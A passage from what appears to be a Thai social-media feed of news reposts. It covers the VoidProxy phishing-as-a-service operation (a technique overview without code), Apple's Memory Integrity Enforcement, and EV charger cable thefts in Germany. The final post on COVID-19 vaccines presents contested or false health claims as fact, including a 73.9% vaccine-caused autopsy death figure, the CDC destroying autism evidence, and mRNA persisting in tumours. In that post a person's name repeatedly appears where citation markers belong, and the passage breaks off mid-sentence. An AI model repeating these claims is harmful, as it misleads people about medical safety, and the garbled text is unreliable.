• เรื่องเล่าจากลิงก์ปลอมถึงการขโมย session cookie: เมื่อการล็อกอินกลายเป็นช่องโหว่ที่ถูกขายเป็นบริการ

    VoidProxy คือแพลตฟอร์ม Phishing-as-a-Service (PhaaS) ที่ถูกเปิดเผยโดย Okta ในเดือนกันยายน 2025 โดยใช้เทคนิค Adversary-in-the-Middle (AitM) เพื่อดักจับข้อมูลการล็อกอินแบบสด ๆ รวมถึงรหัสผ่าน, รหัส MFA และ session cookie ที่สามารถนำไปใช้เข้าบัญชีของเหยื่อได้ทันที

    แฮกเกอร์ที่ใช้ VoidProxy ไม่ต้องสร้างเว็บปลอมเอง เพราะระบบมีทุกอย่างพร้อม: ตั้งแต่การส่งอีเมลหลอกลวงจากบัญชีที่ถูกเจาะของบริการอีเมลจริง เช่น Constant Contact หรือ Active Campaign ไปจนถึงการใช้ URL ย่อและ redirect หลายชั้นเพื่อหลบการตรวจจับ

    เมื่อเหยื่อคลิกลิงก์ จะถูกนำไปยังหน้า Captcha ของ Cloudflare เพื่อหลอกระบบสแกนว่าเป็นผู้ใช้จริง จากนั้นจะเข้าสู่หน้าเว็บปลอมที่เลียนแบบ Microsoft หรือ Google ได้อย่างแนบเนียน หากเหยื่อกรอกข้อมูล ระบบจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของ VoidProxy ที่ทำหน้าที่เป็น reverse proxy และขโมย session cookie ที่ออกโดย Microsoft หรือ Google

    ความน่ากลัวคือ session cookie เหล่านี้สามารถใช้เข้าบัญชีได้โดยไม่ต้องกรอกรหัสผ่านหรือ MFA อีกเลย ทำให้แฮกเกอร์สามารถเข้าถึงอีเมล, ไฟล์, หรือระบบภายในองค์กรได้ทันที

    VoidProxy ยังใช้เทคนิคหลบการวิเคราะห์ เช่น Cloudflare Workers, DNS แบบ dynamic, และโดเมนราคาถูกที่เปลี่ยนได้ตลอดเวลา เช่น .xyz, .icu, .top เพื่อให้ระบบตรวจจับตามไม่ทัน

    ลักษณะของ VoidProxy
    เป็นบริการ Phishing-as-a-Service ที่ใช้เทคนิค AitM
    ดักจับข้อมูลล็อกอินแบบสด รวมถึง MFA และ session cookie
    ใช้ reverse proxy เพื่อขโมยข้อมูลจาก Microsoft และ Google

    วิธีการโจมตี
    ส่งอีเมลหลอกลวงจากบัญชี ESP ที่ถูกเจาะ
    ใช้ URL ย่อและ redirect หลายชั้นเพื่อหลบการตรวจจับ
    ใช้ Cloudflare Captcha และ Workers เพื่อหลอกระบบสแกน

    ความสามารถของระบบ
    สร้างหน้าเว็บปลอมที่เหมือน Microsoft และ Google
    ขโมย session cookie เพื่อเข้าบัญชีโดยไม่ต้องกรอกรหัสอีก
    ใช้โดเมนราคาถูกและ dynamic DNS เพื่อเปลี่ยนโดเมนได้ตลอด

    ความเห็นจากผู้เชี่ยวชาญ
    MFA แบบ SMS และ OTP ไม่สามารถป้องกันการโจมตีแบบนี้ได้
    ควรใช้ Passkeys หรือ security keys ที่ผูกกับอุปกรณ์
    การฝึกอบรมผู้ใช้ช่วยลดความเสี่ยงได้ แต่ไม่สามารถป้องกันได้ทั้งหมด

    https://www.csoonline.com/article/4056512/voidproxy-phishing-as-a-service-operation-steals-microsoft-google-login-credentials.html
    🎙️ เรื่องเล่าจากลิงก์ปลอมถึงการขโมย session cookie: เมื่อการล็อกอินกลายเป็นช่องโหว่ที่ถูกขายเป็นบริการ VoidProxy คือแพลตฟอร์ม Phishing-as-a-Service (PhaaS) ที่ถูกเปิดเผยโดย Okta ในเดือนกันยายน 2025 โดยใช้เทคนิค Adversary-in-the-Middle (AitM) เพื่อดักจับข้อมูลการล็อกอินแบบสด ๆ รวมถึงรหัสผ่าน, รหัส MFA และ session cookie ที่สามารถนำไปใช้เข้าบัญชีของเหยื่อได้ทันที แฮกเกอร์ที่ใช้ VoidProxy ไม่ต้องสร้างเว็บปลอมเอง เพราะระบบมีทุกอย่างพร้อม: ตั้งแต่การส่งอีเมลหลอกลวงจากบัญชีที่ถูกเจาะของบริการอีเมลจริง เช่น Constant Contact หรือ Active Campaign ไปจนถึงการใช้ URL ย่อและ redirect หลายชั้นเพื่อหลบการตรวจจับ เมื่อเหยื่อคลิกลิงก์ จะถูกนำไปยังหน้า Captcha ของ Cloudflare เพื่อหลอกระบบสแกนว่าเป็นผู้ใช้จริง จากนั้นจะเข้าสู่หน้าเว็บปลอมที่เลียนแบบ Microsoft หรือ Google ได้อย่างแนบเนียน หากเหยื่อกรอกข้อมูล ระบบจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของ VoidProxy ที่ทำหน้าที่เป็น reverse proxy และขโมย session cookie ที่ออกโดย Microsoft หรือ Google ความน่ากลัวคือ session cookie เหล่านี้สามารถใช้เข้าบัญชีได้โดยไม่ต้องกรอกรหัสผ่านหรือ MFA อีกเลย ทำให้แฮกเกอร์สามารถเข้าถึงอีเมล, ไฟล์, หรือระบบภายในองค์กรได้ทันที VoidProxy ยังใช้เทคนิคหลบการวิเคราะห์ เช่น Cloudflare Workers, DNS แบบ dynamic, และโดเมนราคาถูกที่เปลี่ยนได้ตลอดเวลา เช่น .xyz, .icu, .top เพื่อให้ระบบตรวจจับตามไม่ทัน ✅ ลักษณะของ VoidProxy ➡️ เป็นบริการ Phishing-as-a-Service ที่ใช้เทคนิค AitM ➡️ ดักจับข้อมูลล็อกอินแบบสด รวมถึง MFA และ session cookie ➡️ ใช้ reverse proxy เพื่อขโมยข้อมูลจาก Microsoft และ Google ✅ วิธีการโจมตี ➡️ ส่งอีเมลหลอกลวงจากบัญชี ESP ที่ถูกเจาะ ➡️ ใช้ URL ย่อและ redirect หลายชั้นเพื่อหลบการตรวจจับ ➡️ ใช้ Cloudflare Captcha และ Workers เพื่อหลอกระบบสแกน ✅ ความสามารถของระบบ ➡️ สร้างหน้าเว็บปลอมที่เหมือน Microsoft และ Google ➡️ ขโมย session cookie เพื่อเข้าบัญชีโดยไม่ต้องกรอกรหัสอีก ➡️ ใช้โดเมนราคาถูกและ dynamic DNS เพื่อเปลี่ยนโดเมนได้ตลอด ✅ ความเห็นจากผู้เชี่ยวชาญ ➡️ MFA แบบ SMS และ OTP ไม่สามารถป้องกันการโจมตีแบบนี้ได้ ➡️ ควรใช้ Passkeys หรือ security keys ที่ผูกกับอุปกรณ์ ➡️ การฝึกอบรมผู้ใช้ช่วยลดความเสี่ยงได้ แต่ไม่สามารถป้องกันได้ทั้งหมด https://www.csoonline.com/article/4056512/voidproxy-phishing-as-a-service-operation-steals-microsoft-google-login-credentials.html
    0 Comments 0 Shares 39 Views 0 Reviews
  • “Apple เปิดตัว Memory Integrity Enforcement บน iPhone 17 — ป้องกันมัลแวร์ระดับรัฐด้วยระบบความปลอดภัยหน่วยความจำที่ไม่เคยมีมาก่อน”

    Apple ประกาศเปิดตัวฟีเจอร์ใหม่ชื่อว่า Memory Integrity Enforcement (MIE) บน iPhone 17 และ iPhone Air ซึ่งถือเป็นการอัปเกรดด้านความปลอดภัยของหน่วยความจำครั้งใหญ่ที่สุดในประวัติศาสตร์ระบบปฏิบัติการสำหรับผู้บริโภค โดยใช้เวลาพัฒนานานกว่า 5 ปี และผสานการทำงานระหว่างฮาร์ดแวร์ Apple Silicon กับระบบปฏิบัติการ iOS อย่างลึกซึ้ง

    เป้าหมายของ MIE คือการป้องกันการโจมตีจากมัลแวร์ระดับสูง โดยเฉพาะ “mercenary spyware” เช่น Pegasus ที่มักถูกใช้โดยรัฐหรือองค์กรเพื่อเจาะระบบของบุคคลเป้าหมาย เช่น นักข่าว นักสิทธิมนุษยชน หรือเจ้าหน้าที่ระดับสูง ซึ่งการโจมตีเหล่านี้มักใช้ช่องโหว่ด้าน memory corruption เป็นหลัก

    หัวใจของ MIE คือการใช้ Enhanced Memory Tagging Extension (EMTE) ซึ่งเป็นการพัฒนาร่วมกับ Arm โดยทุกบล็อกหน่วยความจำจะถูกติด “แท็กลับ” และฮาร์ดแวร์จะตรวจสอบว่าโปรแกรมที่เข้าถึงหน่วยความจำนั้นมีแท็กตรงกันหรือไม่ ถ้าไม่ตรง ระบบจะบล็อกทันทีและปิดโปรเซส — ทำให้การโจมตีแบบ buffer overflow และ use-after-free แทบเป็นไปไม่ได้

    Apple ยังเสริมระบบด้วย Tag Confidentiality Enforcement เพื่อป้องกันการเจาะแท็กผ่าน side-channel และ speculative execution เช่น Spectre V1 โดยใช้เทคนิคใหม่ที่ลดผลกระทบต่อประสิทธิภาพแทบเป็นศูนย์

    นอกจากฮาร์ดแวร์ A19 และ A19 Pro ที่รองรับ MIE แล้ว Apple ยังเปิดให้ผู้พัฒนาใช้งาน EMTE ผ่าน Xcode เพื่อทดสอบแอปของตนภายใต้ระบบความปลอดภัยใหม่นี้ โดยครอบคลุมมากกว่า 70 โปรเซสในระดับผู้ใช้และเคอร์เนล

    ฟีเจอร์ Memory Integrity Enforcement (MIE)
    ป้องกันช่องโหว่ memory corruption เช่น buffer overflow และ use-after-free
    ใช้ Enhanced Memory Tagging Extension (EMTE) แบบ synchronous
    ทุกบล็อกหน่วยความจำมีแท็กลับที่ต้องตรงกันก่อนเข้าถึง
    ระบบจะบล็อกทันทีหากแท็กไม่ตรง และปิดโปรเซสเพื่อความปลอดภัย

    การออกแบบร่วมระหว่างฮาร์ดแวร์และซอฟต์แวร์
    ใช้ Apple Silicon A19 และ A19 Pro ที่มีพื้นที่เฉพาะสำหรับ MIE
    ผสานกับ secure memory allocators เช่น kalloc_type, xzone malloc และ libpas
    ป้องกันการโจมตีภายใน bucket หน่วยความจำที่ software ปกติป้องกันไม่ได้
    ลด overhead ของการตรวจสอบแท็กให้เหลือน้อยที่สุด

    การป้องกันขั้นสูง
    ใช้ Tag Confidentiality Enforcement ป้องกันการเจาะแท็กผ่าน side-channel
    มี mitigation สำหรับ Spectre V1 ที่แทบไม่มีผลต่อ CPU
    ป้องกันการเข้าถึงหน่วยความจำที่ไม่มีแท็ก เช่น global variables
    ใช้ Secure Page Table Monitor เพื่อป้องกันการเจาะเคอร์เนล

    การใช้งานจริงและผลการทดสอบ
    ทดสอบกับ exploit chains จริงจากมัลแวร์ระดับรัฐในช่วง 3 ปีที่ผ่านมา
    พบว่า MIE ตัดขาดขั้นตอนสำคัญของการโจมตี ทำให้ไม่สามารถสร้าง chain ใหม่ได้
    ระบบสามารถป้องกันได้ตั้งแต่ขั้นตอนแรกของการโจมตี
    เปิดให้ผู้พัฒนาใช้งาน EMTE ผ่าน Enhanced Security ใน Xcode

    ข้อมูลเสริมจากภายนอก
    Google เริ่มใช้ MTE ใน Pixel 8 แต่ยังไม่ใช่แบบ always-on และไม่ผสาน OS ลึกเท่า Apple
    Microsoft มีระบบคล้ายกันใน Windows 11 แต่ยังไม่ครอบคลุมระดับเคอร์เนล
    Apple เป็นรายแรกที่ใช้ PAC ใน A12 และพัฒนา EMTE ต่อเนื่อง
    MIE ครอบคลุมมากกว่า 70 โปรเซสใน iOS 26 และ iPhone 17

    https://security.apple.com/blog/memory-integrity-enforcement/
    🛡️ “Apple เปิดตัว Memory Integrity Enforcement บน iPhone 17 — ป้องกันมัลแวร์ระดับรัฐด้วยระบบความปลอดภัยหน่วยความจำที่ไม่เคยมีมาก่อน” Apple ประกาศเปิดตัวฟีเจอร์ใหม่ชื่อว่า Memory Integrity Enforcement (MIE) บน iPhone 17 และ iPhone Air ซึ่งถือเป็นการอัปเกรดด้านความปลอดภัยของหน่วยความจำครั้งใหญ่ที่สุดในประวัติศาสตร์ระบบปฏิบัติการสำหรับผู้บริโภค โดยใช้เวลาพัฒนานานกว่า 5 ปี และผสานการทำงานระหว่างฮาร์ดแวร์ Apple Silicon กับระบบปฏิบัติการ iOS อย่างลึกซึ้ง เป้าหมายของ MIE คือการป้องกันการโจมตีจากมัลแวร์ระดับสูง โดยเฉพาะ “mercenary spyware” เช่น Pegasus ที่มักถูกใช้โดยรัฐหรือองค์กรเพื่อเจาะระบบของบุคคลเป้าหมาย เช่น นักข่าว นักสิทธิมนุษยชน หรือเจ้าหน้าที่ระดับสูง ซึ่งการโจมตีเหล่านี้มักใช้ช่องโหว่ด้าน memory corruption เป็นหลัก หัวใจของ MIE คือการใช้ Enhanced Memory Tagging Extension (EMTE) ซึ่งเป็นการพัฒนาร่วมกับ Arm โดยทุกบล็อกหน่วยความจำจะถูกติด “แท็กลับ” และฮาร์ดแวร์จะตรวจสอบว่าโปรแกรมที่เข้าถึงหน่วยความจำนั้นมีแท็กตรงกันหรือไม่ ถ้าไม่ตรง ระบบจะบล็อกทันทีและปิดโปรเซส — ทำให้การโจมตีแบบ buffer overflow และ use-after-free แทบเป็นไปไม่ได้ Apple ยังเสริมระบบด้วย Tag Confidentiality Enforcement เพื่อป้องกันการเจาะแท็กผ่าน side-channel และ speculative execution เช่น Spectre V1 โดยใช้เทคนิคใหม่ที่ลดผลกระทบต่อประสิทธิภาพแทบเป็นศูนย์ นอกจากฮาร์ดแวร์ A19 และ A19 Pro ที่รองรับ MIE แล้ว Apple ยังเปิดให้ผู้พัฒนาใช้งาน EMTE ผ่าน Xcode เพื่อทดสอบแอปของตนภายใต้ระบบความปลอดภัยใหม่นี้ โดยครอบคลุมมากกว่า 70 โปรเซสในระดับผู้ใช้และเคอร์เนล ✅ ฟีเจอร์ Memory Integrity Enforcement (MIE) ➡️ ป้องกันช่องโหว่ memory corruption เช่น buffer overflow และ use-after-free ➡️ ใช้ Enhanced Memory Tagging Extension (EMTE) แบบ synchronous ➡️ ทุกบล็อกหน่วยความจำมีแท็กลับที่ต้องตรงกันก่อนเข้าถึง ➡️ ระบบจะบล็อกทันทีหากแท็กไม่ตรง และปิดโปรเซสเพื่อความปลอดภัย ✅ การออกแบบร่วมระหว่างฮาร์ดแวร์และซอฟต์แวร์ ➡️ ใช้ Apple Silicon A19 และ A19 Pro ที่มีพื้นที่เฉพาะสำหรับ MIE ➡️ ผสานกับ secure memory allocators เช่น kalloc_type, xzone malloc และ libpas ➡️ ป้องกันการโจมตีภายใน bucket หน่วยความจำที่ software ปกติป้องกันไม่ได้ ➡️ ลด overhead ของการตรวจสอบแท็กให้เหลือน้อยที่สุด ✅ การป้องกันขั้นสูง ➡️ ใช้ Tag Confidentiality Enforcement ป้องกันการเจาะแท็กผ่าน side-channel ➡️ มี mitigation สำหรับ Spectre V1 ที่แทบไม่มีผลต่อ CPU ➡️ ป้องกันการเข้าถึงหน่วยความจำที่ไม่มีแท็ก เช่น global variables ➡️ ใช้ Secure Page Table Monitor เพื่อป้องกันการเจาะเคอร์เนล ✅ การใช้งานจริงและผลการทดสอบ ➡️ ทดสอบกับ exploit chains จริงจากมัลแวร์ระดับรัฐในช่วง 3 ปีที่ผ่านมา ➡️ พบว่า MIE ตัดขาดขั้นตอนสำคัญของการโจมตี ทำให้ไม่สามารถสร้าง chain ใหม่ได้ ➡️ ระบบสามารถป้องกันได้ตั้งแต่ขั้นตอนแรกของการโจมตี ➡️ เปิดให้ผู้พัฒนาใช้งาน EMTE ผ่าน Enhanced Security ใน Xcode ✅ ข้อมูลเสริมจากภายนอก ➡️ Google เริ่มใช้ MTE ใน Pixel 8 แต่ยังไม่ใช่แบบ always-on และไม่ผสาน OS ลึกเท่า Apple ➡️ Microsoft มีระบบคล้ายกันใน Windows 11 แต่ยังไม่ครอบคลุมระดับเคอร์เนล ➡️ Apple เป็นรายแรกที่ใช้ PAC ใน A12 และพัฒนา EMTE ต่อเนื่อง ➡️ MIE ครอบคลุมมากกว่า 70 โปรเซสใน iOS 26 และ iPhone 17 https://security.apple.com/blog/memory-integrity-enforcement/
    SECURITY.APPLE.COM
    Memory Integrity Enforcement: A complete vision for memory safety in Apple devices - Apple Security Research
    Memory Integrity Enforcement (MIE) is the culmination of an unprecedented design and engineering effort spanning half a decade that combines the unique strengths of Apple silicon hardware with our advanced operating system security to provide industry-first, always-on memory safety protection across our devices — without compromising our best-in-class device performance. We believe Memory Integrity Enforcement represents the most significant upgrade to memory safety in the history of consumer operating systems.
    0 Comments 0 Shares 116 Views 0 Reviews
  • เรื่องเล่าจากสายชาร์จที่หายไป: เมื่อการเปลี่ยนผ่านสู่พลังงานสะอาดต้องเจอกับอุปสรรคจากเศษโลหะ

    ในปี 2025 เยอรมนีกำลังเผชิญกับ “โรคระบาด” แบบใหม่—ไม่ใช่ไวรัส แต่คือการลักขโมยสายชาร์จรถยนต์ไฟฟ้าเพื่อขายทองแดงเป็นเศษเหล็ก โดยมีรายงานว่ามีการตัดสายชาร์จมากถึง 70 จุดต่อวันทั่วประเทศ2

    โจรเลือกเป้าหมายที่ง่ายต่อการเข้าถึง เช่น ลานจอดรถซูเปอร์มาร์เก็ตที่ไม่มีคนเฝ้าในเวลากลางคืน หรือจุดชาร์จที่ตั้งอยู่ริมถนน ซึ่งสะดวกทั้งสำหรับผู้ใช้รถและ...ผู้ไม่หวังดี

    สายชาร์จหนึ่งเส้นมีทองแดงมูลค่าประมาณ €40 (~$47) แต่เมื่อขายเป็นเศษเหล็กจะได้เพียงเศษเสี้ยวของมูลค่านั้น ขณะที่ค่าซ่อมแซมและการหยุดให้บริการของสถานีชาร์จอาจสูงกว่าหลายเท่า และใช้เวลาซ่อมนานถึงสองสัปดาห์

    บริษัท EnBW ซึ่งเป็นผู้ให้บริการเครือข่ายชาร์จเร็วรายใหญ่ที่สุดในเยอรมนี และผู้ผลิตสถานีชาร์จ Alpitronic ต่างเร่งปรับปรุงระบบ เช่น เพิ่มกล้องวงจรปิด และอัปเดตซอฟต์แวร์ให้ตรวจจับการขโมยได้เร็วขึ้น แต่ก็ยังไม่สามารถป้องกันได้ล่วงหน้า

    บางฝ่ายเริ่มตั้งคำถามว่า การโจมตีเหล่านี้อาจไม่ใช่แค่การขโมยเพื่อขายเศษโลหะ แต่เป็นการเจาะระบบโครงสร้างพื้นฐานที่สำคัญของประเทศ ซึ่งอาจมีเบื้องหลังที่ลึกกว่าที่คิด

    https://www.tomshardware.com/tech-industry/german-motorists-facing-plague-of-electric-car-charger-cable-thefts-70-charging-points-a-day-being-gutted-to-sell-for-copper-scrap
    🎙️ เรื่องเล่าจากสายชาร์จที่หายไป: เมื่อการเปลี่ยนผ่านสู่พลังงานสะอาดต้องเจอกับอุปสรรคจากเศษโลหะ ในปี 2025 เยอรมนีกำลังเผชิญกับ “โรคระบาด” แบบใหม่—ไม่ใช่ไวรัส แต่คือการลักขโมยสายชาร์จรถยนต์ไฟฟ้าเพื่อขายทองแดงเป็นเศษเหล็ก โดยมีรายงานว่ามีการตัดสายชาร์จมากถึง 70 จุดต่อวันทั่วประเทศ2 โจรเลือกเป้าหมายที่ง่ายต่อการเข้าถึง เช่น ลานจอดรถซูเปอร์มาร์เก็ตที่ไม่มีคนเฝ้าในเวลากลางคืน หรือจุดชาร์จที่ตั้งอยู่ริมถนน ซึ่งสะดวกทั้งสำหรับผู้ใช้รถและ...ผู้ไม่หวังดี สายชาร์จหนึ่งเส้นมีทองแดงมูลค่าประมาณ €40 (~$47) แต่เมื่อขายเป็นเศษเหล็กจะได้เพียงเศษเสี้ยวของมูลค่านั้น ขณะที่ค่าซ่อมแซมและการหยุดให้บริการของสถานีชาร์จอาจสูงกว่าหลายเท่า และใช้เวลาซ่อมนานถึงสองสัปดาห์ บริษัท EnBW ซึ่งเป็นผู้ให้บริการเครือข่ายชาร์จเร็วรายใหญ่ที่สุดในเยอรมนี และผู้ผลิตสถานีชาร์จ Alpitronic ต่างเร่งปรับปรุงระบบ เช่น เพิ่มกล้องวงจรปิด และอัปเดตซอฟต์แวร์ให้ตรวจจับการขโมยได้เร็วขึ้น แต่ก็ยังไม่สามารถป้องกันได้ล่วงหน้า บางฝ่ายเริ่มตั้งคำถามว่า การโจมตีเหล่านี้อาจไม่ใช่แค่การขโมยเพื่อขายเศษโลหะ แต่เป็นการเจาะระบบโครงสร้างพื้นฐานที่สำคัญของประเทศ ซึ่งอาจมีเบื้องหลังที่ลึกกว่าที่คิด https://www.tomshardware.com/tech-industry/german-motorists-facing-plague-of-electric-car-charger-cable-thefts-70-charging-points-a-day-being-gutted-to-sell-for-copper-scrap
    0 Comments 0 Shares 104 Views 0 Reviews
  • ความไม่โปร่งใส, ความกังวลด้านความปลอดภัย และข้อเรียกร้องให้มีการตรวจสอบวัคซีน COVID-19

    ในช่วงไม่กี่เดือนที่ผ่านมา สถานการณ์เกี่ยวกับวัคซีน COVID-19 ได้พัฒนาไปในทิศทางที่มีการตั้งคำถามและเรียกร้องความโปร่งใสมากขึ้นจากหลายฝ่าย **ประธานาธิบดีโดนัลด์ ทรัมป์ ได้ออกมาเรียกร้องให้บริษัทผลิตยาขนาดใหญ่ เช่น Pfizer และ Moderna เปิดเผยข้อมูลทั้งหมดเกี่ยวกับประสิทธิภาพของยา COVID-19 ทันที** โดยระบุว่าประชาชนสมควรได้รับเห็นหลักฐาน [1, 2] ทรัมป์ยังตั้งข้อสงสัยต่อโครงการ Operation Warp Speed ของตัวเอง โดยขอให้มีการตรวจสอบว่าโครงการเร่งพัฒนาวัคซีนนี้ "ยอดเยี่ยมจริงหรือไม่" หรือมีข้อผิดพลาดเกิดขึ้น [1, 4] ข้อเรียกร้องนี้เกิดขึ้นพร้อมกับข่าวที่ปรากฏในรายงานของคณะกรรมการตุลาการของสภาผู้แทนราษฎรเมื่อเดือนพฤษภาคม 2025 ที่ชี้ว่าอาจมีการชะลอการทดสอบวัคซีนโดยเจตนา ซึ่งอาจส่งผลต่อการประกาศความสำเร็จของวัคซีนหลังการเลือกตั้งปี 2020 [5, 6]

    **การเปลี่ยนแปลงที่สำคัญอีกประการคือบทบาทของ Robert F. Kennedy Jr. (RFK Jr.) ซึ่งปัจจุบันดำรงตำแหน่งเลขาธิการกระทรวงสาธารณสุขและบริการมนุษย์ (HHS)** RFK Jr. ผู้ซึ่งเป็นที่รู้จักในฐานะผู้ตั้งคำถามเรื่องวัคซีน ได้เริ่มทบทวนและยกเลิกการลงทุนในการพัฒนาวัคซีน mRNA 22 รายการ Choawalit Chotwattanaphong เขากล่าวว่า **วัคซีน mRNA มีประสิทธิภาพต่ำในการต่อสู้กับไวรัสที่ติดเชื้อทางเดินหายใจส่วนบนเนื่องจากการกลายพันธุ์อย่างรวดเร็ว** ซึ่งทำให้วัคซีนไม่สามารถป้องกันได้เมื่อเกิดการกลายพันธุ์เพียงครั้งเดียว เช่นกรณีของเชื้อ Omicron Choawalit Chotwattanaphong เขายังชี้ให้เห็นถึงความเสี่ยงที่วัคซีนเหล่านี้อาจส่งเสริมการกลายพันธุ์และยืดเวลาการระบาดใหญ่ได้ Choawalit Chotwattanaphong

    ความกังวลด้านความปลอดภัยของวัคซีนเป็นอีกหนึ่งประเด็นสำคัญที่ถูกหยิบยกขึ้นมา **RFK Jr. อ้างว่าวัคซีน COVID-19 อาจนำไปสู่การเสียชีวิตในบางกรณี** โดยอ้างอิงข้อมูลการชันสูตรพลิกศพที่ระบุว่าวัคซีนเป็นสาเหตุการเสียชีวิต 73.9% ในกลุ่มผู้เสียชีวิตหลังฉีดวัคซีน Choawalit Chotwattanaphong เขายังวิพากษ์วิจารณ์อย่างรุนแรงถึงการที่ไม่มี "คำเตือนกล่องดำ" (blackbox warning) เรื่องการเสียชีวิตในเอกสารกำกับวัคซีน แม้ว่ากฎหมายของ FDA จะกำหนดไว้ Choawalit Chotwattanaphong

    มีการเน้นย้ำถึง **การขาด Informed Consent (การยินยอมเข้ารับการรักษาโดยได้รับข้อมูลครบถ้วน) อย่างรุนแรง** ผู้ป่วยหลายราย รวมถึง Dr. Walscott แพทย์ที่ได้รับบาดเจ็บจากวัคซีนยืนยันว่าไม่ได้รับข้อมูลที่แท้จริงและโปร่งใส Choawalit Chotwattanaphong ตัวอย่างที่สะเทือนใจคือเรื่องราวของ Crystal Cordingley ที่เชื่อว่าลูกชายของเธอ Corbin เสียชีวิตจากวัคซีนไข้หวัดใหญ่ โดยพบความเสียหายในสมองที่คล้ายกับกรณี SIDS [9, 10] เธอถูกปฏิเสธข้อมูลและ Informed Consent และพบว่ากุมารแพทย์ได้ยื่นรายงาน VAERS โดยที่เธอไม่ทราบ [10] นอกจากนี้ ยังมีข้อกล่าวหาว่าหน่วยงานเช่น American College of Obstetricians and Gynecologists (ACOG) ถูกควบคุมโดย HHS เพื่อผลักดันวัคซีนในหญิงตั้งครรภ์ Choawalit Chotwattanaphong

    **ความเป็นพิษของ Spike Protein ก็เป็นประเด็นที่น่าจับตา** Dr. Robert Sullivan วิสัญญีแพทย์ผู้ได้รับผลกระทบ ได้เปิดเผยประสบการณ์ส่วนตัวเกี่ยวกับการเกิดความดันโลหิตสูงในปอด (Pulmonary Hypertension) หลังฉีดวัคซีน mRNA COVID-19 และการสูญเสียความจุปอดไปครึ่งหนึ่ง [7, 8] เขากล่าวถึงงานวิจัยที่คาดการณ์ว่า Spike Protein สามารถทำลายหลอดเลือดในปอดและรกได้ [8] และ Dr. Ryan Cole พยาธิแพทย์ได้สังเกตเห็นว่าปัญหาลิ่มเลือดในผู้ป่วย "แย่ลงมาก" หลังจากการฉีดวัคซีนทางพันธุกรรม โดยมีรายงานการเสียชีวิตฉับพลันและโรคหลอดเลือดสมองในผู้ป่วยอายุน้อย [11] การบรรยายยังเสนอว่า **"Long COVID" อาจเป็นการวินิจฉัยที่คลาดเคลื่อน และอาการต่างๆ เช่น สมองล้าและปัญหาทางระบบประสาท อาจเกิดจาก Spike Protein ที่ผลิตโดยวัคซีน mRNA** [12] วัคซีน mRNA ที่ได้รับการดัดแปลงยังพบว่าสามารถคงอยู่ในร่างกายได้นานหลายเดือนและพบได้ในเนื้องอก ซึ่งอาจนำไปสู่โรคแพ้ภูมิตัวเอง [13]

    **ระบบการแพทย์และหน่วยงานสาธารณสุขเองก็ตกอยู่ภายใต้การวิพากษ์วิจารณ์อย่างหนัก** ระบบ VAERS (Vaccine Adverse Event Reporting System) ไม่เป็นที่รู้จักหรือเข้าใจอย่างกว้างขวางในหมู่แพทย์ และมักไม่มีการปฏิบัติตามข้อกำหนดการรายงาน [8] นอกจากนี้ ยังไม่มีการศึกษาอย่างเป็นระบบเกี่ยวกับผลข้างเคียงจากวัคซีน และ "ต้นทุนที่ซ่อนอยู่ของการบาดเจ็บ" ก็ไม่ได้รับการศึกษาหรือสอนในโรงเรียนแพทย์ [7, 12] มีการกล่าวหาว่าเจ้าหน้าที่ CDC ถึงกับทำลายหลักฐานที่เชื่อมโยงวัคซีน MMR กับออทิซึมในเด็กชายชาวแอฟริกัน-อเมริกัน [15, 16]

    สถานการณ์ล่าสุดนี้สะท้อนให้เห็นถึง **ความจำเป็นเร่งด่วนในการฟื้นฟูความรับผิดชอบ ความโปร่งใส และความไว้วางใจของประชาชนในหน่วยงานรัฐบาลและระบบการแพทย์** โดยการตัดสินใจทางการแพทย์ทั้งหมดต้องตั้งอยู่บนพื้นฐานของ Informed Consent ที่แท้จริง [17] มีการคาดการณ์เชิงสมมติฐานว่าหากไม่มีการบังคับใช้คำสั่งให้ฉีดวัคซีน การระบาดใหญ่อาจถูกควบคุมได้เร็วกว่าโดยมุ่งเป้าไปที่กลุ่มเสี่ยงสูงและให้ไวรัสแพร่กระจายในกลุ่มเสี่ยงต่ำ เพื่อสร้างภูมิคุ้มกันหมู่ [6, 18]

    โดยสรุป สถานการณ์ปัจจุบันสะท้อนให้เห็นถึงการเรียกร้องที่เพิ่มขึ้นสำหรับการตรวจสอบข้อมูลเชิงวิทยาศาสตร์อย่างโปร่งใส การให้ความสำคัญกับ Informed Consent และการประเมินผลกระทบที่อาจเกิดขึ้นจากวัคซีน COVID-19 อย่างละเอียดถี่ถ้วน.

    https://www.youtube.com/live/4-JxzRRgdy0
    https://youtu.be/-Y2d_4BSGP4

    https://www.facebook.com/share/16v8B1t4by/
    ✍️ความไม่โปร่งใส, ความกังวลด้านความปลอดภัย และข้อเรียกร้องให้มีการตรวจสอบวัคซีน COVID-19 ในช่วงไม่กี่เดือนที่ผ่านมา สถานการณ์เกี่ยวกับวัคซีน COVID-19 ได้พัฒนาไปในทิศทางที่มีการตั้งคำถามและเรียกร้องความโปร่งใสมากขึ้นจากหลายฝ่าย **ประธานาธิบดีโดนัลด์ ทรัมป์ ได้ออกมาเรียกร้องให้บริษัทผลิตยาขนาดใหญ่ เช่น Pfizer และ Moderna เปิดเผยข้อมูลทั้งหมดเกี่ยวกับประสิทธิภาพของยา COVID-19 ทันที** โดยระบุว่าประชาชนสมควรได้รับเห็นหลักฐาน [1, 2] ทรัมป์ยังตั้งข้อสงสัยต่อโครงการ Operation Warp Speed ของตัวเอง โดยขอให้มีการตรวจสอบว่าโครงการเร่งพัฒนาวัคซีนนี้ "ยอดเยี่ยมจริงหรือไม่" หรือมีข้อผิดพลาดเกิดขึ้น [1, 4] ข้อเรียกร้องนี้เกิดขึ้นพร้อมกับข่าวที่ปรากฏในรายงานของคณะกรรมการตุลาการของสภาผู้แทนราษฎรเมื่อเดือนพฤษภาคม 2025 ที่ชี้ว่าอาจมีการชะลอการทดสอบวัคซีนโดยเจตนา ซึ่งอาจส่งผลต่อการประกาศความสำเร็จของวัคซีนหลังการเลือกตั้งปี 2020 [5, 6] **การเปลี่ยนแปลงที่สำคัญอีกประการคือบทบาทของ Robert F. Kennedy Jr. (RFK Jr.) ซึ่งปัจจุบันดำรงตำแหน่งเลขาธิการกระทรวงสาธารณสุขและบริการมนุษย์ (HHS)** RFK Jr. ผู้ซึ่งเป็นที่รู้จักในฐานะผู้ตั้งคำถามเรื่องวัคซีน ได้เริ่มทบทวนและยกเลิกการลงทุนในการพัฒนาวัคซีน mRNA 22 รายการ [1] เขากล่าวว่า **วัคซีน mRNA 